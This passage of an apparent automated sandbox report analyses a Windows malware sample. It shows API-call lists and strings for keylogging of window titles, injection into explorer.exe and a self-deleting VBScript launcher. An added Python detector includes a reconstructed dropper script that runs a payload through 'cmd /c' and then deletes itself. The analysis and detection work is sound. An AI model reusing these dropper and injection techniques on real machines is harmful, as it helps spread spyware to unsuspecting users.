• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                              • API String ID: 3795512280-3163867910
                              • Opcode ID: a5e8bd849d2efb949b0d5fa848b2f94c7da7ca507b050a9d2381404b3d3051d3
                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                              • Opcode Fuzzy Hash: a5e8bd849d2efb949b0d5fa848b2f94c7da7ca507b050a9d2381404b3d3051d3
                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                              • String ID: \ws2_32$\wship6$getaddrinfo
                              • API String ID: 2490988753-3078833738
                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                              • _free.LIBCMT ref: 004500A6
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 004500C8
                              • _free.LIBCMT ref: 004500DD
                              • _free.LIBCMT ref: 004500E8
                              • _free.LIBCMT ref: 0045010A
                              • _free.LIBCMT ref: 0045011D
                              • _free.LIBCMT ref: 0045012B
                              • _free.LIBCMT ref: 00450136
                              • _free.LIBCMT ref: 0045016E
                              • _free.LIBCMT ref: 00450175
                              • _free.LIBCMT ref: 00450192
                              • _free.LIBCMT ref: 004501AA
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                              APIs
                              • __EH_prolog.LIBCMT ref: 0041912D
                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                              • API String ID: 489098229-65789007
                              • Opcode ID: 9d68a57725902cee1e2f4c0bf3d0b8e26a84b1680611e2d1f684673f52445b2e
                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                              • Opcode Fuzzy Hash: 9d68a57725902cee1e2f4c0bf3d0b8e26a84b1680611e2d1f684673f52445b2e
                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                              APIs
                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                              • ExitProcess.KERNEL32 ref: 0040C832
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                              • API String ID: 1913171305-390638927
                              • Opcode ID: bece3d90f9d9eafcbf4cc39b2f0266e1d84ca687775a7de423d297ed33e0470e
                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                              • Opcode Fuzzy Hash: bece3d90f9d9eafcbf4cc39b2f0266e1d84ca687775a7de423d297ed33e0470e
                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
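The string table of the function above (".vbs", "Temp", "exepath", CreateObject("WScript.Shell").Run "cmd /c "", and CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), followed by ShellExecuteW and ExitProcess) is the classic pattern of a dropper that writes a small VBScript to the temp folder, lets it relaunch an executable through cmd /c, and has the script delete itself. The scanner below is an added example, not code from the Joe Sandbox report or from the sample: it looks for that combination in script text, recovers the command the script would run, and walks a directory for matching .vbs files. The sample script, the executable path inside it and the file names are constructed for the example, not values observed in the analysis.

```python
"""Scan for the self-delete VBScript pattern shown in the report entry above.

Added example; not code from the Joe Sandbox report or from the sample.
The string table shows the sample building a .vbs in %Temp% that runs
"cmd /c" through WScript.Shell and then removes itself with
Scripting.FileSystemObject.DeleteFile(Wscript.ScriptFullName). The sample
script and file names below are constructed, not observed values.
"""
import re
from pathlib import Path
from typing import Optional

# Indicators taken from the string table. VBScript identifiers are
# case-insensitive, so match case-insensitively; variants change casing.
RX_RUN = re.compile(
    r'CreateObject\(\s*"WScript\.Shell"\s*\)\s*\.Run\s+"(?P<cmd>(?:""|[^"])*)"',
    re.I)
RX_DELETE_SELF = re.compile(
    r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)'
    r'\s*\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)',
    re.I)


def unescape_vbs(s: str) -> str:
    """A doubled quote inside a VBScript string literal is one literal quote."""
    return s.replace('""', '"')


def analyse_script(text: str) -> dict:
    """Return which indicators hit and the command the script would run."""
    run = RX_RUN.search(text)
    cmd: Optional[str] = unescape_vbs(run.group("cmd")) if run else None
    uses_cmd_c = bool(cmd) and cmd.lower().startswith("cmd /c")
    deletes_self = RX_DELETE_SELF.search(text) is not None
    return {
        "runs_command": run is not None,
        "uses_cmd_c": uses_cmd_c,
        "deletes_self": deletes_self,
        "command": cmd,
        # Self-deletion on its own is common in installers; the combination
        # with a cmd /c launcher is what matches the behaviour in the report.
        "verdict": deletes_self and uses_cmd_c,
    }


def scan_directory(directory: Path) -> list:
    """Analyse every *.vbs below directory; return (path, result) for hits."""
    hits = []
    for vbs in sorted(directory.rglob("*.vbs")):
        try:
            text = vbs.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        result = analyse_script(text)
        if result["verdict"]:
            hits.append((str(vbs), result))
    return hits


# Constructed reconstruction of the script from the fragments in the string
# table; the executable path is a placeholder, not one seen in the analysis.
SAMPLE_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""'
    'C:\\Users\\user\\AppData\\Local\\Temp\\payload.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject")'
    '.DeleteFile(Wscript.ScriptFullName)\r\n'
)

if __name__ == "__main__":
    print(analyse_script(SAMPLE_VBS))
```

Run it against a user's temp folder after a suspected infection; a script that only deletes itself is reported as a partial hit, and only the launcher plus self-delete combination gets a verdict.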
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                              APIs
                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                              • GetLastError.KERNEL32 ref: 00454A96
                              • __dosmaperr.LIBCMT ref: 00454A9D
                              • GetFileType.KERNEL32(00000000), ref: 00454AA9
                              • GetLastError.KERNEL32 ref: 00454AB3
                              • __dosmaperr.LIBCMT ref: 00454ABC
                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                              • CloseHandle.KERNEL32(?), ref: 00454C26
                              • GetLastError.KERNEL32 ref: 00454C58
                              • __dosmaperr.LIBCMT ref: 00454C5F
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                              • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                              APIs
                              • __Init_thread_footer.LIBCMT ref: 0040A456
                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                              • GetForegroundWindow.USER32 ref: 0040A467
                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                              • String ID: [${ User has been idle for $ minutes }$]
                              • API String ID: 911427763-3954389425
                              • Opcode ID: 28200f3005b4fd24b85b386b341ea4380163e584f5bda866baf5ce3779d03c92
                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                              • Opcode Fuzzy Hash: 28200f3005b4fd24b85b386b341ea4380163e584f5bda866baf5ce3779d03c92
                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID:
                              • String ID: 65535$udp
                              • API String ID: 0-1267037602
                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                              • String ID: <$@$@FG$@FG$TUF$Temp
                              • API String ID: 1107811701-4124992407
                              • Opcode ID: 752ca13c782d44821a1ec6be30a7add5be14379de4efd94ca99b1656ba8a68f0
                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                              • Opcode Fuzzy Hash: 752ca13c782d44821a1ec6be30a7add5be14379de4efd94ca99b1656ba8a68f0
                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                              APIs
                              • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe), ref: 00406705
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: CurrentProcess
                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                              • API String ID: 2050909247-1144799832
                              • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                              • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                              • __dosmaperr.LIBCMT ref: 004393CD
                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                              • __dosmaperr.LIBCMT ref: 0043940A
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                              • __dosmaperr.LIBCMT ref: 0043945E
                              • _free.LIBCMT ref: 0043946A
                              • _free.LIBCMT ref: 00439471
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                              • String ID:
                              • API String ID: 2441525078-0
                              • Opcode ID: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                              • Opcode Fuzzy Hash: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                              • TranslateMessage.USER32(?), ref: 00404F30
                              • DispatchMessageA.USER32(?), ref: 00404F3B
                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                               Memory Dump Source
                               • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Similarity
                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                              • String ID: CloseChat$DisplayMessage$GetMessage
                              • API String ID: 2956720200-749203953
                              • Opcode ID: 9e828d8d79306d3ca16dab3380ce8c6928072e32339e335044387e38b1293e95
                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                              • Opcode Fuzzy Hash: 9e828d8d79306d3ca16dab3380ce8c6928072e32339e335044387e38b1293e95
                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                              Memory Dump Source
